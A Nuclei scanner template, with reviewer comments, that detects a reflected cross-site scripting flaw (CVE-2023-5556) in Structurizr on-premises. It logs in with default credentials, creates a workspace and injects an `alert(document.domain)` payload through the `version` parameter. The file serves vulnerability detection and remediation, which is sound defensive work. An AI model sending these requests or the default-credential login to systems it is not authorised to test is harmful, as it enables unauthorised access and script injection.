# Nuclei template for CVE-2023-5556: reflected XSS in Structurizr on-premises.
# Request flow: sign-in page -> login -> dashboard (session check) -> create a
# workspace -> request the workspace page with a random marker in `version`
# and check whether the marker comes back unescaped.
id: CVE-2023-5556

info:
  name: Structurizr on-premises - Cross Site Scripting
  author: shankaracharya
  severity: medium
  description: |
    Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.
  remediation: |
    Apply the latest security patches or updates provided by Structurizr to fix the XSS vulnerability.
  reference:
    - https://huntr.com/bounties/a3ee0f98-6898-41ae-b1bd-242a03a73d1b/
    - https://github.com/structurizr/onpremises/commit/6cff4f792b010dfb1ff6a0b4ae1c6e398f8f8a18
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-5556
    cwe-id: CWE-79
    epss-score: 0.0007
    epss-percentile: 0.28947
    cpe: cpe:2.3:a:structurizr:on-premises_installation:*:*:*:*:*:*:*:*
  metadata:
    max-request: 5
    vendor: structurizr
    product: on-premises_installation
    shodan-query: http.favicon.hash:1199592666
  # `authenticated`: the check only runs once the login in request 2 succeeds.
  tags: cve,cve2023,xss,structurizr,oos,authenticated

variables:
  # Random per-run marker, so the reflection matcher cannot be satisfied by
  # static page content.
  str: "{{randstr}}"

http:
  - raw:
      # 1. Sign-in page; the `csrf` extractor below reads the form token from it.
      - |
        GET /signin HTTP/1.1
        Host: {{Hostname}}

      # 2. Login. `username`/`password` come from the payload lists below;
      #    `csrf` is the internal extractor value from request 1.
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&_csrf={{csrf}}&hash=

      # 3. Session check: body_3 is matched on 'Sign out' (see matchers).
      #    The Content-Type header is not needed on a body-less GET; kept as in
      #    the original.
      - |
        GET /dashboard HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

      # 4. Create a workspace; the `workspace` extractor reads its id from a
      #    response header (presumably the redirect Location — verify).
      - |
        GET /workspace/create HTTP/1.1
        Host: {{Hostname}}

      # 5. Reflection check: the marker is sent in `version` and body_5 is
      #    matched for the tail of the value appearing verbatim (not HTML-encoded).
      - |
        GET /workspace/{{workspace}}/?version={{str}}%22);alert(document.domain);// HTTP/1.1
        Host: {{Hostname}}

    # Single-value lists; pitchfork pairs them positionally, so exactly one
    # login attempt is made.
    attack: pitchfork
    payloads:
      # NOTE(review): these look like the installation defaults, so a positive
      # result also implies the default credentials were never changed — confirm
      # against the vendor docs.
      username:
        - "structurizr"
      password:
        - "password"

    matchers-condition: and
    matchers:
      # Response 3 must look like a logged-in dashboard.
      - type: word
        part: body_3
        words:
          - ''          # presumably satisfied by any body, so 'Sign out' alone decides this matcher
          - 'Sign out'
        condition: and
      # Response 5 must contain the injected tail unescaped together with the
      # product name.
      - type: word
        part: body_5
        words:
          - '");alert(document.domain);//'
          - 'Structurizr'
        condition: and
      - type: status
        status:
          - 200

    extractors:
      # CSRF form token from request 1, consumed by request 2 (internal only).
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="_csrf" value="([0-9a-z-]+)"'
        internal: true
      # Numeric workspace id from a response header, consumed by request 5.
      - type: regex
        name: workspace
        group: 1
        part: header
        regex:
          - '\/workspace\/([0-9]+)\?scriptNonce='
        internal: true
# NOTE(review): the digest below appears to be the template signature over the
# file bytes; reformatting the file likely requires re-signing — confirm.
# digest: 490a004630440220271c92d7995694dbe343d56009d8854bb38cae92331641f43099d08c003ce1cb02200779d2024d6bac6fc0fe22f537d3122d655cfee23bea08577bba47ee95653215:922c64590222798bb761d5b6d8e72950